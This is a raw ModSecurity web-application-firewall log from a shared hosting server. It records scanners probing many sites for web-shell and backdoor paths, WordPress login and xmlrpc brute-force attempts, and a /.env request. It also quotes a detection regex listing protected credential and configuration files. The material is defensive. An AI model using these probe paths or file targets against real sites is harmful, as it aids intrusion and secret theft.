[Tue May 26 13:51:27.811982 2026] [security2:error] [pid 560287:tid 560426] [client 185.251.19.133:48189] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "ktmadvance-senegal.com"] [uri "/wp-login.php"] [unique_id "ahVYB5mX5s6sDS3wJVcYKQAAAI0"]
[Tue May 26 13:51:28.027507 2026] [security2:error] [pid 560287:tid 560445] [client 185.92.25.95:47227] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/classwithtostring.php"] [unique_id "ahVYCJmX5s6sDS3wJVcYNAAAAJ8"]
[Tue May 26 13:51:28.136051 2026] [security2:error] [pid 555743:tid 555954] [client 20.196.127.68:17521] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/media.php"] [unique_id "ahVYCMjqAquC0YaxQjC37AAAAVs"]
[Tue May 26 13:51:28.246262 2026] [security2:error] [pid 560287:tid 560547] [client 15.235.169.50:53039] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/uploads/_1681078363.php"] [unique_id "ahVYCJmX5s6sDS3wJVcYOQAAAP8"]
[Tue May 26 13:51:28.703359 2026] [security2:error] [pid 560287:tid 560548] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVYCJmX5s6sDS3wJVcYQQAAAQA"], referer: https://www.anujtradingco.com/
[Tue May 26 13:51:28.717446 2026] [security2:error] [pid 555743:tid 555873] [client 15.235.169.50:53095] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/css/leafmailer.php"] [unique_id "ahVYCMjqAquC0YaxQjC3-gAAAQo"]
[Tue May 26 13:51:28.768220 2026] [security2:error] [pid 555743:tid 555921] [client 185.192.71.231:54349] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 231.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/index/function.php"] [unique_id "ahVYCMjqAquC0YaxQjC3-QAAATo"]
[Tue May 26 13:51:28.790295 2026] [security2:error] [pid 560287:tid 560516] [client 20.196.127.68:17506] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/mar.php"] [unique_id "ahVYCJmX5s6sDS3wJVcYQwAAAOI"]
[Tue May 26 13:51:29.206536 2026] [security2:error] [pid 555743:tid 555913] [client 15.235.169.50:53173] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/bs1.php"] [unique_id "ahVYCcjqAquC0YaxQjC4BAAAATI"]
[Tue May 26 13:51:29.259251 2026] [security2:error] [pid 560287:tid 560497] [client 185.92.25.101:35387] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/tinyfilemanager.php"] [unique_id "ahVYCZmX5s6sDS3wJVcYSQAAANA"]
[Tue May 26 13:51:29.370695 2026] [security2:error] [pid 555743:tid 555894] [client 20.196.127.68:13968] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/my1.php"] [unique_id "ahVYCcjqAquC0YaxQjC4BQAAAR8"]
[Tue May 26 13:51:29.467578 2026] [security2:error] [pid 555743:tid 555908] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVYCcjqAquC0YaxQjC4BwAAAS0"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1286778&moderation-hash=ee1b993e81deb901f247d21e751728a0
[Tue May 26 13:51:29.684402 2026] [security2:error] [pid 560287:tid 560423] [client 15.235.169.50:53271] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/js/404.php"] [unique_id "ahVYCZmX5s6sDS3wJVcYTwAAAIo"]
[Tue May 26 13:51:30.000491 2026] [security2:error] [pid 555743:tid 555881] [client 20.196.127.68:13307] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/mm.php"] [unique_id "ahVYCcjqAquC0YaxQjC4EgAAARI"]
[Tue May 26 13:51:30.187817 2026] [security2:error] [pid 555743:tid 555972] [client 15.235.169.50:53338] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/languages/index.php"] [unique_id "ahVYCsjqAquC0YaxQjC4FwAAAW0"]
[Tue May 26 13:51:30.638146 2026] [security2:error] [pid 555743:tid 555918] [client 20.196.127.68:14934] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/network.php"] [unique_id "ahVYCsjqAquC0YaxQjC4JAAAATc"]
[Tue May 26 13:51:30.683149 2026] [security2:error] [pid 555743:tid 555922] [client 15.235.169.50:53425] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/pki-validation/index.php"] [unique_id "ahVYCsjqAquC0YaxQjC4JgAAATs"]
[Tue May 26 13:51:30.829744 2026] [security2:error] [pid 560287:tid 560496] [client 91.230.225.171:55497] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 171.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/js/bas.php"] [unique_id "ahVYCpmX5s6sDS3wJVcYVgAAAM8"]
[Tue May 26 13:51:31.141010 2026] [security2:error] [pid 560287:tid 560458] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYCpmX5s6sDS3wJVcYVQAAAKs"]
[Tue May 26 13:51:31.181499 2026] [security2:error] [pid 560287:tid 560523] [client 15.235.169.50:53498] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/pki-validation/admin.php"] [unique_id "ahVYC5mX5s6sDS3wJVcYXgAAAOk"]
[Tue May 26 13:51:31.292704 2026] [security2:error] [pid 560287:tid 560518] [client 20.196.127.68:14933] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/new.php"] [unique_id "ahVYC5mX5s6sDS3wJVcYXwAAAOQ"]
[Tue May 26 13:51:31.422381 2026] [security2:error] [pid 555743:tid 555901] [client 185.192.71.229:39199] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 229.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/.well-known/pki-validation/moon.php"] [unique_id "ahVYC8jqAquC0YaxQjC4MAAAASY"]
[Tue May 26 13:51:31.472954 2026] [security2:error] [pid 560287:tid 560490] [client 129.222.147.134:32026] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYC5mX5s6sDS3wJVcYYAAAAMk"]
[Tue May 26 13:51:31.473063 2026] [security2:error] [pid 560287:tid 560490] [client 129.222.147.134:32026] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYC5mX5s6sDS3wJVcYYAAAAMk"]
[Tue May 26 13:51:31.651081 2026] [security2:error] [pid 560287:tid 560482] [client 15.235.169.50:53571] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/acme-challenge/plugins.php"] [unique_id "ahVYC5mX5s6sDS3wJVcYZAAAAME"]
[Tue May 26 13:51:31.722670 2026] [security2:error] [pid 555743:tid 555875] [client 106.192.248.115:50777] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYC8jqAquC0YaxQjC4NQAAAQw"]
[Tue May 26 13:51:31.727196 2026] [security2:error] [pid 555743:tid 555875] [client 106.192.248.115:50777] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYC8jqAquC0YaxQjC4NQAAAQw"]
[Tue May 26 13:51:31.925795 2026] [security2:error] [pid 560287:tid 560552] [client 20.196.127.68:14512] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/0x.php"] [unique_id "ahVYC5mX5s6sDS3wJVcYbAAAAQQ"]
[Tue May 26 13:51:31.931577 2026] [security2:error] [pid 555743:tid 555921] [client 185.192.71.236:63771] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/file.php"] [unique_id "ahVYC8jqAquC0YaxQjC4OAAAATo"]
[Tue May 26 13:51:32.120541 2026] [security2:error] [pid 555743:tid 555983] [client 15.235.169.50:53647] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/pki-validation/"] [unique_id "ahVYDMjqAquC0YaxQjC4PAAAAXg"]
[Tue May 26 13:51:32.130613 2026] [security2:error] [pid 560287:tid 560465] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYC5mX5s6sDS3wJVcYZgAAALI"]
[Tue May 26 13:51:32.407688 2026] [security2:error] [pid 555743:tid 555898] [client 185.192.71.237:46409] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/js/index.php"] [unique_id "ahVYDMjqAquC0YaxQjC4QQAAASM"]
[Tue May 26 13:51:32.557729 2026] [security2:error] [pid 560287:tid 560545] [client 20.196.127.68:13965] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/0.php"] [unique_id "ahVYDJmX5s6sDS3wJVcYdQAAAP0"]
[Tue May 26 13:51:32.605292 2026] [security2:error] [pid 560287:tid 560427] [client 15.235.169.50:53709] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/admin.php"] [unique_id "ahVYDJmX5s6sDS3wJVcYeAAAAI4"]
[Tue May 26 13:51:32.731331 2026] [security2:error] [pid 560287:tid 560452] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYDJmX5s6sDS3wJVcYcwAAAKY"]
[Tue May 26 13:51:32.815844 2026] [security2:error] [pid 560287:tid 560422] [client 185.192.71.243:59775] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 243.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/upgrade/item.php"] [unique_id "ahVYDJmX5s6sDS3wJVcYfgAAAIk"]
[Tue May 26 13:51:33.080533 2026] [security2:error] [pid 555743:tid 555952] [client 15.235.169.50:53800] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/about/function.php"] [unique_id "ahVYDcjqAquC0YaxQjC4SgAAAVk"]
[Tue May 26 13:51:33.140053 2026] [security2:error] [pid 560287:tid 560462] [client 20.196.127.68:14932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/oxshell.php"] [unique_id "ahVYDZmX5s6sDS3wJVcYgAAAAK8"]
[Tue May 26 13:51:33.214680 2026] [security2:error] [pid 560287:tid 560515] [client 185.92.25.97:30925] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/buy.php"] [unique_id "ahVYDZmX5s6sDS3wJVcYgwAAAOE"]
[Tue May 26 13:51:33.554723 2026] [security2:error] [pid 555743:tid 555885] [client 15.235.169.50:53840] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/admin.php"] [unique_id "ahVYDcjqAquC0YaxQjC4VAAAARY"]
[Tue May 26 13:51:33.748424 2026] [security2:error] [pid 555743:tid 555884] [client 91.230.225.175:63955] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 175.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/languages/wp-conflg.php"] [unique_id "ahVYDcjqAquC0YaxQjC4WQAAARU"]
[Tue May 26 13:51:33.776099 2026] [security2:error] [pid 555743:tid 555972] [client 20.196.127.68:13998] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/php8.php"] [unique_id "ahVYDcjqAquC0YaxQjC4XQAAAW0"]
[Tue May 26 13:51:34.044458 2026] [security2:error] [pid 555743:tid 555904] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYDcjqAquC0YaxQjC4VwAAASk"]
[Tue May 26 13:51:34.049861 2026] [security2:error] [pid 555743:tid 555949] [client 15.235.169.50:53891] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/pki-validation/wp.php"] [unique_id "ahVYDsjqAquC0YaxQjC4YQAAAVY"]
[Tue May 26 13:51:34.256518 2026] [security2:error] [pid 555743:tid 555957] [client 185.192.71.240:62665] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/themes/classwithtostring.php"] [unique_id "ahVYDsjqAquC0YaxQjC4YgAAAV4"]
[Tue May 26 13:51:34.490637 2026] [security2:error] [pid 555743:tid 555925] [client 20.196.127.68:14474] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/p.php"] [unique_id "ahVYDsjqAquC0YaxQjC4bAAAAT4"]
[Tue May 26 13:51:34.545499 2026] [security2:error] [pid 555743:tid 555890] [client 15.235.169.50:53949] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/images/index.php"] [unique_id "ahVYDsjqAquC0YaxQjC4bQAAARs"]
[Tue May 26 13:51:34.882031 2026] [security2:error] [pid 555743:tid 555766] [remote 193.42.61.12:43942] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahVYDsjqAquC0YaxQjC4cgABIRY"]
[Tue May 26 13:51:35.049482 2026] [security2:error] [pid 555743:tid 555928] [client 15.235.169.50:54022] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/upload.php"] [unique_id "ahVYD8jqAquC0YaxQjC4egAAAUE"]
[Tue May 26 13:51:35.130120 2026] [security2:error] [pid 555743:tid 555948] [client 20.196.127.68:14928] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/php.php"] [unique_id "ahVYD8jqAquC0YaxQjC4ewAAAVU"]
[Tue May 26 13:51:35.205169 2026] [security2:error] [pid 560287:tid 560533] [client 185.192.71.241:30909] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 241.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/plugins/elementor/wp-wjvngrh.php"] [unique_id "ahVYD5mX5s6sDS3wJVcYjAAAAPM"]
[Tue May 26 13:51:35.504537 2026] [security2:error] [pid 560287:tid 560550] [client 176.65.139.239:60102] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.quickdeliveryexp.com.onesoft.in"] [uri "/.env"] [unique_id "ahVYD5mX5s6sDS3wJVcYkwAAAQI"]
[Tue May 26 13:51:35.578669 2026] [security2:error] [pid 560287:tid 560493] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYD5mX5s6sDS3wJVcYigAAAMw"]
[Tue May 26 13:51:35.658399 2026] [security2:error] [pid 560287:tid 560526] [client 185.92.25.105:63209] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 105.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/IXR/fix.php7"] [unique_id "ahVYD5mX5s6sDS3wJVcYlQAAAOw"]
[Tue May 26 13:51:35.761147 2026] [security2:error] [pid 560287:tid 560456] [client 20.196.127.68:14917] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/past.php"] [unique_id "ahVYD5mX5s6sDS3wJVcYlgAAAKk"]
[Tue May 26 13:51:35.781216 2026] [security2:error] [pid 560287:tid 560502] [client 15.235.169.50:54084] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/wp-login.php"] [unique_id "ahVYD5mX5s6sDS3wJVcYlAAAANQ"]
[Tue May 26 13:51:36.098858 2026] [security2:error] [pid 555743:tid 555883] [client 185.92.25.107:39245] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/widgets/dyqvcfqv.php"] [unique_id "ahVYEMjqAquC0YaxQjC4jAAAARQ"]
[Tue May 26 13:51:36.268411 2026] [security2:error] [pid 560287:tid 560447] [client 15.235.169.50:54231] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/lock360.php"] [unique_id "ahVYEJmX5s6sDS3wJVcYmgAAAKE"]
[Tue May 26 13:51:36.345036 2026] [security2:error] [pid 555743:tid 555881] [client 62.60.130.228:54813] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "consultrgb.com"] [uri "/wp-login.php"] [unique_id "ahVYEMjqAquC0YaxQjC4jQAAARI"], referer: https://duckduckgo.com/
[Tue May 26 13:51:36.402290 2026] [security2:error] [pid 555743:tid 555933] [client 20.196.127.68:13263] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.juniorwoodies.com"] [uri "/root.php"] [unique_id "ahVYEMjqAquC0YaxQjC4lAAAAUY"]
[Tue May 26 13:51:36.640250 2026] [security2:error] [pid 555743:tid 555961] [client 91.230.225.174:58771] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 174.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/admin/function.php"] [unique_id "ahVYEMjqAquC0YaxQjC4lgAAAWI"]
